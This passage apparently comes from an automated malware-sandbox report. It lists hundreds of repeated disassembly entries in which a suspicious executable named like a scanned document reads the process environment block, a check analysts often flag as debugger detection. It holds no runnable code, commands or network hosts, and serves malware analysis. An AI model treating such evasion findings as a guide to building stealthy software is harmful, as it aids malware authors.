            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0110019F mov eax, dword ptr fs:[00000030h]3_2_0110019F
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0110019F mov eax, dword ptr fs:[00000030h]3_2_0110019F
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107A197 mov eax, dword ptr fs:[00000030h]3_2_0107A197
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107A197 mov eax, dword ptr fs:[00000030h]3_2_0107A197
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107A197 mov eax, dword ptr fs:[00000030h]3_2_0107A197
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0113C188 mov eax, dword ptr fs:[00000030h]3_2_0113C188
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0113C188 mov eax, dword ptr fs:[00000030h]3_2_0113C188
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010D7190 mov eax, dword ptr fs:[00000030h]3_2_010D7190
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011311A4 mov eax, dword ptr fs:[00000030h]3_2_011311A4
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011311A4 mov eax, dword ptr fs:[00000030h]3_2_011311A4
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011311A4 mov eax, dword ptr fs:[00000030h]3_2_011311A4
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011311A4 mov eax, dword ptr fs:[00000030h]3_2_011311A4
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0109B1B0 mov eax, dword ptr fs:[00000030h]3_2_0109B1B0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011461C3 mov eax, dword ptr fs:[00000030h]3_2_011461C3
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011461C3 mov eax, dword ptr fs:[00000030h]3_2_011461C3
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010BD1D0 mov eax, dword ptr fs:[00000030h]3_2_010BD1D0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010BD1D0 mov ecx, dword ptr fs:[00000030h]3_2_010BD1D0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011551CB mov eax, dword ptr fs:[00000030h]3_2_011551CB
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010FE1D0 mov eax, dword ptr fs:[00000030h]3_2_010FE1D0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010FE1D0 mov eax, dword ptr fs:[00000030h]3_2_010FE1D0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010FE1D0 mov ecx, dword ptr fs:[00000030h]3_2_010FE1D0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010FE1D0 mov eax, dword ptr fs:[00000030h]3_2_010FE1D0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010FE1D0 mov eax, dword ptr fs:[00000030h]3_2_010FE1D0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010A51EF mov eax, dword ptr fs:[00000030h]3_2_010A51EF
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010A51EF mov eax, dword ptr fs:[00000030h]3_2_010A51EF
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010A51EF mov eax, dword ptr fs:[00000030h]3_2_010A51EF
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010A51EF mov eax, dword ptr fs:[00000030h]3_2_010A51EF
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010A51EF mov eax, dword ptr fs:[00000030h]3_2_010A51EF
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010A51EF mov eax, dword ptr fs:[00000030h]3_2_010A51EF
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010A51EF mov eax, dword ptr fs:[00000030h]3_2_010A51EF
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010A51EF mov eax, dword ptr fs:[00000030h]3_2_010A51EF
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010A51EF mov eax, dword ptr fs:[00000030h]3_2_010A51EF
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010A51EF mov eax, dword ptr fs:[00000030h]3_2_010A51EF
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010A51EF mov eax, dword ptr fs:[00000030h]3_2_010A51EF
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010A51EF mov eax, dword ptr fs:[00000030h]3_2_010A51EF
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010A51EF mov eax, dword ptr fs:[00000030h]3_2_010A51EF
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010851ED mov eax, dword ptr fs:[00000030h]3_2_010851ED
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011271F9 mov esi, dword ptr fs:[00000030h]3_2_011271F9
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011561E5 mov eax, dword ptr fs:[00000030h]3_2_011561E5
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010B01F8 mov eax, dword ptr fs:[00000030h]3_2_010B01F8
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01104000 mov ecx, dword ptr fs:[00000030h]3_2_01104000
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0109E016 mov eax, dword ptr fs:[00000030h]3_2_0109E016
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0109E016 mov eax, dword ptr fs:[00000030h]3_2_0109E016
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0109E016 mov eax, dword ptr fs:[00000030h]3_2_0109E016
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0109E016 mov eax, dword ptr fs:[00000030h]3_2_0109E016
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107A020 mov eax, dword ptr fs:[00000030h]3_2_0107A020
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107C020 mov eax, dword ptr fs:[00000030h]3_2_0107C020
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0114903E mov eax, dword ptr fs:[00000030h]3_2_0114903E
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0114903E mov eax, dword ptr fs:[00000030h]3_2_0114903E
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0114903E mov eax, dword ptr fs:[00000030h]3_2_0114903E
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0114903E mov eax, dword ptr fs:[00000030h]3_2_0114903E
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0112705E mov ebx, dword ptr fs:[00000030h]3_2_0112705E
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0112705E mov eax, dword ptr fs:[00000030h]3_2_0112705E
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01082050 mov eax, dword ptr fs:[00000030h]3_2_01082050
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010AB052 mov eax, dword ptr fs:[00000030h]3_2_010AB052
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01155060 mov eax, dword ptr fs:[00000030h]3_2_01155060
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01091070 mov eax, dword ptr fs:[00000030h]3_2_01091070
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01091070 mov ecx, dword ptr fs:[00000030h]3_2_01091070
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01091070 mov eax, dword ptr fs:[00000030h]3_2_01091070
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01091070 mov eax, dword ptr fs:[00000030h]3_2_01091070
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01091070 mov eax, dword ptr fs:[00000030h]3_2_01091070
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01091070 mov eax, dword ptr fs:[00000030h]3_2_01091070
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01091070 mov eax, dword ptr fs:[00000030h]3_2_01091070
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01091070 mov eax, dword ptr fs:[00000030h]3_2_01091070
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01091070 mov eax, dword ptr fs:[00000030h]3_2_01091070
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01091070 mov eax, dword ptr fs:[00000030h]3_2_01091070
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01091070 mov eax, dword ptr fs:[00000030h]3_2_01091070
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01091070 mov eax, dword ptr fs:[00000030h]3_2_01091070
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01091070 mov eax, dword ptr fs:[00000030h]3_2_01091070
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010AC073 mov eax, dword ptr fs:[00000030h]3_2_010AC073
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0110106E mov eax, dword ptr fs:[00000030h]3_2_0110106E
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010FD070 mov ecx, dword ptr fs:[00000030h]3_2_010FD070
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0108208A mov eax, dword ptr fs:[00000030h]3_2_0108208A
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107D08D mov eax, dword ptr fs:[00000030h]3_2_0107D08D
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010B909C mov eax, dword ptr fs:[00000030h]3_2_010B909C
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010AD090 mov eax, dword ptr fs:[00000030h]3_2_010AD090
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010AD090 mov eax, dword ptr fs:[00000030h]3_2_010AD090
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01085096 mov eax, dword ptr fs:[00000030h]3_2_01085096
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011460B8 mov eax, dword ptr fs:[00000030h]3_2_011460B8
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011460B8 mov ecx, dword ptr fs:[00000030h]3_2_011460B8
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010970C0 mov eax, dword ptr fs:[00000030h]3_2_010970C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010970C0 mov ecx, dword ptr fs:[00000030h]3_2_010970C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010970C0 mov ecx, dword ptr fs:[00000030h]3_2_010970C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010970C0 mov eax, dword ptr fs:[00000030h]3_2_010970C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010970C0 mov ecx, dword ptr fs:[00000030h]3_2_010970C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010970C0 mov ecx, dword ptr fs:[00000030h]3_2_010970C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010970C0 mov eax, dword ptr fs:[00000030h]3_2_010970C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010970C0 mov eax, dword ptr fs:[00000030h]3_2_010970C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010970C0 mov eax, dword ptr fs:[00000030h]3_2_010970C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010970C0 mov eax, dword ptr fs:[00000030h]3_2_010970C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010970C0 mov eax, dword ptr fs:[00000030h]3_2_010970C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010970C0 mov eax, dword ptr fs:[00000030h]3_2_010970C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010970C0 mov eax, dword ptr fs:[00000030h]3_2_010970C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010970C0 mov eax, dword ptr fs:[00000030h]3_2_010970C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010970C0 mov eax, dword ptr fs:[00000030h]3_2_010970C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010970C0 mov eax, dword ptr fs:[00000030h]3_2_010970C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010970C0 mov eax, dword ptr fs:[00000030h]3_2_010970C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010970C0 mov eax, dword ptr fs:[00000030h]3_2_010970C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011550D9 mov eax, dword ptr fs:[00000030h]3_2_011550D9
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011020DE mov eax, dword ptr fs:[00000030h]3_2_011020DE
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010FD0C0 mov eax, dword ptr fs:[00000030h]3_2_010FD0C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010FD0C0 mov eax, dword ptr fs:[00000030h]3_2_010FD0C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010A90DB mov eax, dword ptr fs:[00000030h]3_2_010A90DB
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010880E9 mov eax, dword ptr fs:[00000030h]3_2_010880E9
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107A0E3 mov ecx, dword ptr fs:[00000030h]3_2_0107A0E3
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010A50E4 mov eax, dword ptr fs:[00000030h]3_2_010A50E4
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010A50E4 mov ecx, dword ptr fs:[00000030h]3_2_010A50E4
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107C0F0 mov eax, dword ptr fs:[00000030h]3_2_0107C0F0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010C20F0 mov ecx, dword ptr fs:[00000030h]3_2_010C20F0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010BA30B mov eax, dword ptr fs:[00000030h]3_2_010BA30B
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010BA30B mov eax, dword ptr fs:[00000030h]3_2_010BA30B
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010BA30B mov eax, dword ptr fs:[00000030h]3_2_010BA30B
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107C310 mov ecx, dword ptr fs:[00000030h]3_2_0107C310
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010A0310 mov ecx, dword ptr fs:[00000030h]3_2_010A0310
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0110930B mov eax, dword ptr fs:[00000030h]3_2_0110930B
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0110930B mov eax, dword ptr fs:[00000030h]3_2_0110930B
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0110930B mov eax, dword ptr fs:[00000030h]3_2_0110930B
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010AF32A mov eax, dword ptr fs:[00000030h]3_2_010AF32A
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01077330 mov eax, dword ptr fs:[00000030h]3_2_01077330
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0114132D mov eax, dword ptr fs:[00000030h]3_2_0114132D
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0114132D mov eax, dword ptr fs:[00000030h]3_2_0114132D
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0114A352 mov eax, dword ptr fs:[00000030h]3_2_0114A352
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107D34C mov eax, dword ptr fs:[00000030h]3_2_0107D34C
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107D34C mov eax, dword ptr fs:[00000030h]3_2_0107D34C
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0110035C mov eax, dword ptr fs:[00000030h]3_2_0110035C
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0110035C mov eax, dword ptr fs:[00000030h]3_2_0110035C
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0110035C mov eax, dword ptr fs:[00000030h]3_2_0110035C
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0110035C mov ecx, dword ptr fs:[00000030h]3_2_0110035C
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0110035C mov eax, dword ptr fs:[00000030h]3_2_0110035C
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0110035C mov eax, dword ptr fs:[00000030h]3_2_0110035C
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01155341 mov eax, dword ptr fs:[00000030h]3_2_01155341
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01079353 mov eax, dword ptr fs:[00000030h]3_2_01079353
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01079353 mov eax, dword ptr fs:[00000030h]3_2_01079353
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01102349 mov eax, dword ptr fs:[00000030h]3_2_01102349
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01102349 mov eax, dword ptr fs:[00000030h]3_2_01102349
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01102349 mov eax, dword ptr fs:[00000030h]3_2_01102349
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01102349 mov eax, dword ptr fs:[00000030h]3_2_01102349
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01102349 mov eax, dword ptr fs:[00000030h]3_2_01102349
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01102349 mov eax, dword ptr fs:[00000030h]3_2_01102349
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01102349 mov eax, dword ptr fs:[00000030h]3_2_01102349
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01102349 mov eax, dword ptr fs:[00000030h]3_2_01102349
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01102349 mov eax, dword ptr fs:[00000030h]3_2_01102349
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01102349 mov eax, dword ptr fs:[00000030h]3_2_01102349
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01102349 mov eax, dword ptr fs:[00000030h]3_2_01102349
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01102349 mov eax, dword ptr fs:[00000030h]3_2_01102349
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01102349 mov eax, dword ptr fs:[00000030h]3_2_01102349
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01102349 mov eax, dword ptr fs:[00000030h]3_2_01102349
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01102349 mov eax, dword ptr fs:[00000030h]3_2_01102349
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0112437C mov eax, dword ptr fs:[00000030h]3_2_0112437C
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0113F367 mov eax, dword ptr fs:[00000030h]3_2_0113F367
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01087370 mov eax, dword ptr fs:[00000030h]3_2_01087370
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01087370 mov eax, dword ptr fs:[00000030h]3_2_01087370
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01087370 mov eax, dword ptr fs:[00000030h]3_2_01087370
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010A438F mov eax, dword ptr fs:[00000030h]3_2_010A438F
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010A438F mov eax, dword ptr fs:[00000030h]3_2_010A438F
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0115539D mov eax, dword ptr fs:[00000030h]3_2_0115539D
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107E388 mov eax, dword ptr fs:[00000030h]3_2_0107E388
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107E388 mov eax, dword ptr fs:[00000030h]3_2_0107E388
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107E388 mov eax, dword ptr fs:[00000030h]3_2_0107E388
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01078397 mov eax, dword ptr fs:[00000030h]3_2_01078397
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01078397 mov eax, dword ptr fs:[00000030h]3_2_01078397
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01078397 mov eax, dword ptr fs:[00000030h]3_2_01078397
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010D739A mov eax, dword ptr fs:[00000030h]3_2_010D739A
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010D739A mov eax, dword ptr fs:[00000030h]3_2_010D739A
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010B33A0 mov eax, dword ptr fs:[00000030h]3_2_010B33A0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010B33A0 mov eax, dword ptr fs:[00000030h]3_2_010B33A0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010A33A5 mov eax, dword ptr fs:[00000030h]3_2_010A33A5
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0113B3D0 mov ecx, dword ptr fs:[00000030h]3_2_0113B3D0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0108A3C0 mov eax, dword ptr fs:[00000030h]3_2_0108A3C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0108A3C0 mov eax, dword ptr fs:[00000030h]3_2_0108A3C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0108A3C0 mov eax, dword ptr fs:[00000030h]3_2_0108A3C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0108A3C0 mov eax, dword ptr fs:[00000030h]3_2_0108A3C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0108A3C0 mov eax, dword ptr fs:[00000030h]3_2_0108A3C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0108A3C0 mov eax, dword ptr fs:[00000030h]3_2_0108A3C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010883C0 mov eax, dword ptr fs:[00000030h]3_2_010883C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010883C0 mov eax, dword ptr fs:[00000030h]3_2_010883C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010883C0 mov eax, dword ptr fs:[00000030h]3_2_010883C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010883C0 mov eax, dword ptr fs:[00000030h]3_2_010883C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0113C3CD mov eax, dword ptr fs:[00000030h]3_2_0113C3CD
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010903E9 mov eax, dword ptr fs:[00000030h]3_2_010903E9
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010903E9 mov eax, dword ptr fs:[00000030h]3_2_010903E9
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010903E9 mov eax, dword ptr fs:[00000030h]3_2_010903E9
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010903E9 mov eax, dword ptr fs:[00000030h]3_2_010903E9
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010903E9 mov eax, dword ptr fs:[00000030h]3_2_010903E9
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010903E9 mov eax, dword ptr fs:[00000030h]3_2_010903E9
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010903E9 mov eax, dword ptr fs:[00000030h]3_2_010903E9
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010903E9 mov eax, dword ptr fs:[00000030h]3_2_010903E9
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011553FC mov eax, dword ptr fs:[00000030h]3_2_011553FC
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010B63FF mov eax, dword ptr fs:[00000030h]3_2_010B63FF
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0113F3E6 mov eax, dword ptr fs:[00000030h]3_2_0113F3E6
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0109E3F0 mov eax, dword ptr fs:[00000030h]3_2_0109E3F0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0109E3F0 mov eax, dword ptr fs:[00000030h]3_2_0109E3F0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0109E3F0 mov eax, dword ptr fs:[00000030h]3_2_0109E3F0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010B7208 mov eax, dword ptr fs:[00000030h]3_2_010B7208
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010B7208 mov eax, dword ptr fs:[00000030h]3_2_010B7208
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01155227 mov eax, dword ptr fs:[00000030h]3_2_01155227
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107823B mov eax, dword ptr fs:[00000030h]3_2_0107823B
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0113B256 mov eax, dword ptr fs:[00000030h]3_2_0113B256
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0113B256 mov eax, dword ptr fs:[00000030h]3_2_0113B256
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010B724D mov eax, dword ptr fs:[00000030h]3_2_010B724D
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01079240 mov eax, dword ptr fs:[00000030h]3_2_01079240
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01079240 mov eax, dword ptr fs:[00000030h]3_2_01079240
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01086259 mov eax, dword ptr fs:[00000030h]3_2_01086259
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107A250 mov eax, dword ptr fs:[00000030h]3_2_0107A250
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01130274 mov eax, dword ptr fs:[00000030h]3_2_01130274
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01130274 mov eax, dword ptr fs:[00000030h]3_2_01130274
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01130274 mov eax, dword ptr fs:[00000030h]3_2_01130274
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01130274 mov eax, dword ptr fs:[00000030h]3_2_01130274
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01130274 mov eax, dword ptr fs:[00000030h]3_2_01130274
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01130274 mov eax, dword ptr fs:[00000030h]3_2_01130274
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01130274 mov eax, dword ptr fs:[00000030h]3_2_01130274
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01130274 mov eax, dword ptr fs:[00000030h]3_2_01130274
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01130274 mov eax, dword ptr fs:[00000030h]3_2_01130274
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01130274 mov eax, dword ptr fs:[00000030h]3_2_01130274
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01130274 mov eax, dword ptr fs:[00000030h]3_2_01130274
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01130274 mov eax, dword ptr fs:[00000030h]3_2_01130274
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01084260 mov eax, dword ptr fs:[00000030h]3_2_01084260
